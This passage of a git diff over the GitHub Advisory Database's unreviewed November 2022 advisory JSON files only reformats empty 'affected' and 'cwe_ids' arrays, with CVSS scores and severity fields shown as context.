b/advisories/unreviewed/2022/11/GHSA-6gcw-xxjf-q6rm/GHSA-6gcw-xxjf-q6rm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-87p3-v4w4-q5h8/GHSA-87p3-v4w4-q5h8.json b/advisories/unreviewed/2022/11/GHSA-87p3-v4w4-q5h8/GHSA-87p3-v4w4-q5h8.json index 85595bf73a0..d2cd25b6ab7 100644 --- a/advisories/unreviewed/2022/11/GHSA-87p3-v4w4-q5h8/GHSA-87p3-v4w4-q5h8.json +++ b/advisories/unreviewed/2022/11/GHSA-87p3-v4w4-q5h8/GHSA-87p3-v4w4-q5h8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-8935-f3hq-fv5m/GHSA-8935-f3hq-fv5m.json b/advisories/unreviewed/2022/11/GHSA-8935-f3hq-fv5m/GHSA-8935-f3hq-fv5m.json index 63ffab25e24..dc9c5f5077c 100644 --- a/advisories/unreviewed/2022/11/GHSA-8935-f3hq-fv5m/GHSA-8935-f3hq-fv5m.json +++ b/advisories/unreviewed/2022/11/GHSA-8935-f3hq-fv5m/GHSA-8935-f3hq-fv5m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-8j6x-r8x6-r4vg/GHSA-8j6x-r8x6-r4vg.json b/advisories/unreviewed/2022/11/GHSA-8j6x-r8x6-r4vg/GHSA-8j6x-r8x6-r4vg.json index 1fa98b23cd8..5b1cdf9d93e 100644 --- a/advisories/unreviewed/2022/11/GHSA-8j6x-r8x6-r4vg/GHSA-8j6x-r8x6-r4vg.json +++ b/advisories/unreviewed/2022/11/GHSA-8j6x-r8x6-r4vg/GHSA-8j6x-r8x6-r4vg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -51,9 +49,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-8p4p-376x-fv7v/GHSA-8p4p-376x-fv7v.json b/advisories/unreviewed/2022/11/GHSA-8p4p-376x-fv7v/GHSA-8p4p-376x-fv7v.json index 017f751048b..eca6f5d7558 100644 --- a/advisories/unreviewed/2022/11/GHSA-8p4p-376x-fv7v/GHSA-8p4p-376x-fv7v.json +++ b/advisories/unreviewed/2022/11/GHSA-8p4p-376x-fv7v/GHSA-8p4p-376x-fv7v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-8x2q-5267-2xhm/GHSA-8x2q-5267-2xhm.json b/advisories/unreviewed/2022/11/GHSA-8x2q-5267-2xhm/GHSA-8x2q-5267-2xhm.json index 7bfb625a955..93988618072 100644 --- a/advisories/unreviewed/2022/11/GHSA-8x2q-5267-2xhm/GHSA-8x2q-5267-2xhm.json +++ b/advisories/unreviewed/2022/11/GHSA-8x2q-5267-2xhm/GHSA-8x2q-5267-2xhm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-9h2x-cq23-hmx7/GHSA-9h2x-cq23-hmx7.json b/advisories/unreviewed/2022/11/GHSA-9h2x-cq23-hmx7/GHSA-9h2x-cq23-hmx7.json index 049751d1fc6..9a3003d5e62 100644 --- a/advisories/unreviewed/2022/11/GHSA-9h2x-cq23-hmx7/GHSA-9h2x-cq23-hmx7.json +++ b/advisories/unreviewed/2022/11/GHSA-9h2x-cq23-hmx7/GHSA-9h2x-cq23-hmx7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-c3gw-7267-x4wq/GHSA-c3gw-7267-x4wq.json b/advisories/unreviewed/2022/11/GHSA-c3gw-7267-x4wq/GHSA-c3gw-7267-x4wq.json index dc26b83a555..3b1c8062372 100644 --- a/advisories/unreviewed/2022/11/GHSA-c3gw-7267-x4wq/GHSA-c3gw-7267-x4wq.json +++ b/advisories/unreviewed/2022/11/GHSA-c3gw-7267-x4wq/GHSA-c3gw-7267-x4wq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-ccfm-q6rr-cwmr/GHSA-ccfm-q6rr-cwmr.json b/advisories/unreviewed/2022/11/GHSA-ccfm-q6rr-cwmr/GHSA-ccfm-q6rr-cwmr.json index 977596abb0b..fb733a52e17 100644 --- a/advisories/unreviewed/2022/11/GHSA-ccfm-q6rr-cwmr/GHSA-ccfm-q6rr-cwmr.json +++ b/advisories/unreviewed/2022/11/GHSA-ccfm-q6rr-cwmr/GHSA-ccfm-q6rr-cwmr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-cggv-c7cr-3358/GHSA-cggv-c7cr-3358.json b/advisories/unreviewed/2022/11/GHSA-cggv-c7cr-3358/GHSA-cggv-c7cr-3358.json index 9c5a41be657..5f720c03377 100644 --- a/advisories/unreviewed/2022/11/GHSA-cggv-c7cr-3358/GHSA-cggv-c7cr-3358.json +++ b/advisories/unreviewed/2022/11/GHSA-cggv-c7cr-3358/GHSA-cggv-c7cr-3358.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-cjwx-h5pw-chvg/GHSA-cjwx-h5pw-chvg.json b/advisories/unreviewed/2022/11/GHSA-cjwx-h5pw-chvg/GHSA-cjwx-h5pw-chvg.json index fc2aefa138b..1ff6f903f15 100644 --- a/advisories/unreviewed/2022/11/GHSA-cjwx-h5pw-chvg/GHSA-cjwx-h5pw-chvg.json +++ b/advisories/unreviewed/2022/11/GHSA-cjwx-h5pw-chvg/GHSA-cjwx-h5pw-chvg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -75,9 +73,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-cww5-rhpx-mg2j/GHSA-cww5-rhpx-mg2j.json b/advisories/unreviewed/2022/11/GHSA-cww5-rhpx-mg2j/GHSA-cww5-rhpx-mg2j.json index 041340c2ec1..cbaf6ccd70f 100644 --- a/advisories/unreviewed/2022/11/GHSA-cww5-rhpx-mg2j/GHSA-cww5-rhpx-mg2j.json +++ b/advisories/unreviewed/2022/11/GHSA-cww5-rhpx-mg2j/GHSA-cww5-rhpx-mg2j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-f4jq-v948-j29c/GHSA-f4jq-v948-j29c.json b/advisories/unreviewed/2022/11/GHSA-f4jq-v948-j29c/GHSA-f4jq-v948-j29c.json index dcd177212b8..e09b988e497 100644 --- a/advisories/unreviewed/2022/11/GHSA-f4jq-v948-j29c/GHSA-f4jq-v948-j29c.json +++ b/advisories/unreviewed/2022/11/GHSA-f4jq-v948-j29c/GHSA-f4jq-v948-j29c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-f8x7-cjv7-c4v7/GHSA-f8x7-cjv7-c4v7.json b/advisories/unreviewed/2022/11/GHSA-f8x7-cjv7-c4v7/GHSA-f8x7-cjv7-c4v7.json index b7091919855..8aec1500a8b 100644 --- a/advisories/unreviewed/2022/11/GHSA-f8x7-cjv7-c4v7/GHSA-f8x7-cjv7-c4v7.json +++ b/advisories/unreviewed/2022/11/GHSA-f8x7-cjv7-c4v7/GHSA-f8x7-cjv7-c4v7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-fgf8-vx7f-99w6/GHSA-fgf8-vx7f-99w6.json b/advisories/unreviewed/2022/11/GHSA-fgf8-vx7f-99w6/GHSA-fgf8-vx7f-99w6.json index 2d93488fd54..840f6c45554 100644 --- a/advisories/unreviewed/2022/11/GHSA-fgf8-vx7f-99w6/GHSA-fgf8-vx7f-99w6.json +++ b/advisories/unreviewed/2022/11/GHSA-fgf8-vx7f-99w6/GHSA-fgf8-vx7f-99w6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-g3fw-7m9c-g9m8/GHSA-g3fw-7m9c-g9m8.json b/advisories/unreviewed/2022/11/GHSA-g3fw-7m9c-g9m8/GHSA-g3fw-7m9c-g9m8.json index be1eda9bf5b..1cdffdfe966 100644 --- a/advisories/unreviewed/2022/11/GHSA-g3fw-7m9c-g9m8/GHSA-g3fw-7m9c-g9m8.json +++ b/advisories/unreviewed/2022/11/GHSA-g3fw-7m9c-g9m8/GHSA-g3fw-7m9c-g9m8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-h37x-544m-w8g9/GHSA-h37x-544m-w8g9.json b/advisories/unreviewed/2022/11/GHSA-h37x-544m-w8g9/GHSA-h37x-544m-w8g9.json index 030b6313a5c..fe16a6c144f 100644 --- a/advisories/unreviewed/2022/11/GHSA-h37x-544m-w8g9/GHSA-h37x-544m-w8g9.json +++ b/advisories/unreviewed/2022/11/GHSA-h37x-544m-w8g9/GHSA-h37x-544m-w8g9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-hc4h-qxrx-4g37/GHSA-hc4h-qxrx-4g37.json b/advisories/unreviewed/2022/11/GHSA-hc4h-qxrx-4g37/GHSA-hc4h-qxrx-4g37.json index 4cbc4207e2a..868f0d59bc3 100644 --- a/advisories/unreviewed/2022/11/GHSA-hc4h-qxrx-4g37/GHSA-hc4h-qxrx-4g37.json +++ b/advisories/unreviewed/2022/11/GHSA-hc4h-qxrx-4g37/GHSA-hc4h-qxrx-4g37.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-hppc-7rjj-h77r/GHSA-hppc-7rjj-h77r.json b/advisories/unreviewed/2022/11/GHSA-hppc-7rjj-h77r/GHSA-hppc-7rjj-h77r.json index 596aac48b4f..4f54fd14bf6 100644 --- a/advisories/unreviewed/2022/11/GHSA-hppc-7rjj-h77r/GHSA-hppc-7rjj-h77r.json +++ b/advisories/unreviewed/2022/11/GHSA-hppc-7rjj-h77r/GHSA-hppc-7rjj-h77r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-j38m-4q67-m9hm/GHSA-j38m-4q67-m9hm.json b/advisories/unreviewed/2022/11/GHSA-j38m-4q67-m9hm/GHSA-j38m-4q67-m9hm.json index a32f3a5df2a..2a3e373c7d4 100644 --- a/advisories/unreviewed/2022/11/GHSA-j38m-4q67-m9hm/GHSA-j38m-4q67-m9hm.json +++ b/advisories/unreviewed/2022/11/GHSA-j38m-4q67-m9hm/GHSA-j38m-4q67-m9hm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-j9q9-ghpj-f6qv/GHSA-j9q9-ghpj-f6qv.json b/advisories/unreviewed/2022/11/GHSA-j9q9-ghpj-f6qv/GHSA-j9q9-ghpj-f6qv.json index 34be0d5b5e0..5825f7b623f 100644 --- a/advisories/unreviewed/2022/11/GHSA-j9q9-ghpj-f6qv/GHSA-j9q9-ghpj-f6qv.json +++ b/advisories/unreviewed/2022/11/GHSA-j9q9-ghpj-f6qv/GHSA-j9q9-ghpj-f6qv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-jpmg-8f7f-j8pq/GHSA-jpmg-8f7f-j8pq.json b/advisories/unreviewed/2022/11/GHSA-jpmg-8f7f-j8pq/GHSA-jpmg-8f7f-j8pq.json index 1f4a19d85b5..942a0502082 100644 --- a/advisories/unreviewed/2022/11/GHSA-jpmg-8f7f-j8pq/GHSA-jpmg-8f7f-j8pq.json +++ b/advisories/unreviewed/2022/11/GHSA-jpmg-8f7f-j8pq/GHSA-jpmg-8f7f-j8pq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-mgh2-3cf4-78r5/GHSA-mgh2-3cf4-78r5.json b/advisories/unreviewed/2022/11/GHSA-mgh2-3cf4-78r5/GHSA-mgh2-3cf4-78r5.json index f5562f55545..e799e44d5f2 100644 --- a/advisories/unreviewed/2022/11/GHSA-mgh2-3cf4-78r5/GHSA-mgh2-3cf4-78r5.json +++ b/advisories/unreviewed/2022/11/GHSA-mgh2-3cf4-78r5/GHSA-mgh2-3cf4-78r5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-mjhv-4xgh-4wx2/GHSA-mjhv-4xgh-4wx2.json b/advisories/unreviewed/2022/11/GHSA-mjhv-4xgh-4wx2/GHSA-mjhv-4xgh-4wx2.json index 6729b16f502..1a5063215f1 100644 --- a/advisories/unreviewed/2022/11/GHSA-mjhv-4xgh-4wx2/GHSA-mjhv-4xgh-4wx2.json +++ b/advisories/unreviewed/2022/11/GHSA-mjhv-4xgh-4wx2/GHSA-mjhv-4xgh-4wx2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-mpfg-jjqj-fjqq/GHSA-mpfg-jjqj-fjqq.json b/advisories/unreviewed/2022/11/GHSA-mpfg-jjqj-fjqq/GHSA-mpfg-jjqj-fjqq.json index 71376fdfb5a..63166909e2b 100644 --- a/advisories/unreviewed/2022/11/GHSA-mpfg-jjqj-fjqq/GHSA-mpfg-jjqj-fjqq.json +++ b/advisories/unreviewed/2022/11/GHSA-mpfg-jjqj-fjqq/GHSA-mpfg-jjqj-fjqq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-mpjg-5mfj-5233/GHSA-mpjg-5mfj-5233.json b/advisories/unreviewed/2022/11/GHSA-mpjg-5mfj-5233/GHSA-mpjg-5mfj-5233.json index 409a64b0704..a107cf70ea8 100644 --- a/advisories/unreviewed/2022/11/GHSA-mpjg-5mfj-5233/GHSA-mpjg-5mfj-5233.json +++ b/advisories/unreviewed/2022/11/GHSA-mpjg-5mfj-5233/GHSA-mpjg-5mfj-5233.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-mqrp-362v-5fq5/GHSA-mqrp-362v-5fq5.json b/advisories/unreviewed/2022/11/GHSA-mqrp-362v-5fq5/GHSA-mqrp-362v-5fq5.json index 91db8f96ae7..b4f66ce9993 100644 --- a/advisories/unreviewed/2022/11/GHSA-mqrp-362v-5fq5/GHSA-mqrp-362v-5fq5.json +++ b/advisories/unreviewed/2022/11/GHSA-mqrp-362v-5fq5/GHSA-mqrp-362v-5fq5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-mr6c-w33g-2mjj/GHSA-mr6c-w33g-2mjj.json b/advisories/unreviewed/2022/11/GHSA-mr6c-w33g-2mjj/GHSA-mr6c-w33g-2mjj.json index cc4045b9349..f0bacc8b9e8 100644 --- a/advisories/unreviewed/2022/11/GHSA-mr6c-w33g-2mjj/GHSA-mr6c-w33g-2mjj.json +++ b/advisories/unreviewed/2022/11/GHSA-mr6c-w33g-2mjj/GHSA-mr6c-w33g-2mjj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-p8c5-57m9-rp9f/GHSA-p8c5-57m9-rp9f.json b/advisories/unreviewed/2022/11/GHSA-p8c5-57m9-rp9f/GHSA-p8c5-57m9-rp9f.json index 6cd350571ab..81714fa593c 100644 --- a/advisories/unreviewed/2022/11/GHSA-p8c5-57m9-rp9f/GHSA-p8c5-57m9-rp9f.json +++ b/advisories/unreviewed/2022/11/GHSA-p8c5-57m9-rp9f/GHSA-p8c5-57m9-rp9f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-pc4m-vcwh-9c5h/GHSA-pc4m-vcwh-9c5h.json b/advisories/unreviewed/2022/11/GHSA-pc4m-vcwh-9c5h/GHSA-pc4m-vcwh-9c5h.json index 5a3de51985e..c11e8a985ec 100644 --- a/advisories/unreviewed/2022/11/GHSA-pc4m-vcwh-9c5h/GHSA-pc4m-vcwh-9c5h.json +++ b/advisories/unreviewed/2022/11/GHSA-pc4m-vcwh-9c5h/GHSA-pc4m-vcwh-9c5h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-pr54-qrpp-j9vj/GHSA-pr54-qrpp-j9vj.json b/advisories/unreviewed/2022/11/GHSA-pr54-qrpp-j9vj/GHSA-pr54-qrpp-j9vj.json index 0a3f47eac8f..b7fde288010 100644 --- a/advisories/unreviewed/2022/11/GHSA-pr54-qrpp-j9vj/GHSA-pr54-qrpp-j9vj.json +++ b/advisories/unreviewed/2022/11/GHSA-pr54-qrpp-j9vj/GHSA-pr54-qrpp-j9vj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-q4jh-7c38-fcx6/GHSA-q4jh-7c38-fcx6.json b/advisories/unreviewed/2022/11/GHSA-q4jh-7c38-fcx6/GHSA-q4jh-7c38-fcx6.json index 8dbb3ae75d6..1df1a82fbca 100644 --- a/advisories/unreviewed/2022/11/GHSA-q4jh-7c38-fcx6/GHSA-q4jh-7c38-fcx6.json +++ b/advisories/unreviewed/2022/11/GHSA-q4jh-7c38-fcx6/GHSA-q4jh-7c38-fcx6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-qm8r-pwq4-p842/GHSA-qm8r-pwq4-p842.json b/advisories/unreviewed/2022/11/GHSA-qm8r-pwq4-p842/GHSA-qm8r-pwq4-p842.json index 46fb605a008..963737a147d 100644 --- a/advisories/unreviewed/2022/11/GHSA-qm8r-pwq4-p842/GHSA-qm8r-pwq4-p842.json +++ b/advisories/unreviewed/2022/11/GHSA-qm8r-pwq4-p842/GHSA-qm8r-pwq4-p842.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-qmjc-q235-3hw5/GHSA-qmjc-q235-3hw5.json b/advisories/unreviewed/2022/11/GHSA-qmjc-q235-3hw5/GHSA-qmjc-q235-3hw5.json index 7bd66363e3d..e9dfbf760bb 100644 --- a/advisories/unreviewed/2022/11/GHSA-qmjc-q235-3hw5/GHSA-qmjc-q235-3hw5.json +++ b/advisories/unreviewed/2022/11/GHSA-qmjc-q235-3hw5/GHSA-qmjc-q235-3hw5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/11/GHSA-rjj4-r4wr-cjq8/GHSA-rjj4-r4wr-cjq8.json b/advisories/unreviewed/2022/11/GHSA-rjj4-r4wr-cjq8/GHSA-rjj4-r4wr-cjq8.json index 45e456aae4a..5fbdad40915 100644 --- a/advisories/unreviewed/2022/11/GHSA-rjj4-r4wr-cjq8/GHSA-rjj4-r4wr-cjq8.json +++ b/advisories/unreviewed/2022/11/GHSA-rjj4-r4wr-cjq8/GHSA-rjj4-r4wr-cjq8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-v3qm-xpj7-89x6/GHSA-v3qm-xpj7-89x6.json b/advisories/unreviewed/2022/11/GHSA-v3qm-xpj7-89x6/GHSA-v3qm-xpj7-89x6.json index f6abdf697da..965e41147fe 100644 --- a/advisories/unreviewed/2022/11/GHSA-v3qm-xpj7-89x6/GHSA-v3qm-xpj7-89x6.json +++ b/advisories/unreviewed/2022/11/GHSA-v3qm-xpj7-89x6/GHSA-v3qm-xpj7-89x6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/11/GHSA-vfgr-2rxv-7v7g/GHSA-vfgr-2rxv-7v7g.json b/advisories/unreviewed/2022/11/GHSA-vfgr-2rxv-7v7g/GHSA-vfgr-2rxv-7v7g.json index bc50313c21f..0f3755a1008 100644 --- a/advisories/unreviewed/2022/11/GHSA-vfgr-2rxv-7v7g/GHSA-vfgr-2rxv-7v7g.json +++ b/advisories/unreviewed/2022/11/GHSA-vfgr-2rxv-7v7g/GHSA-vfgr-2rxv-7v7g.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + 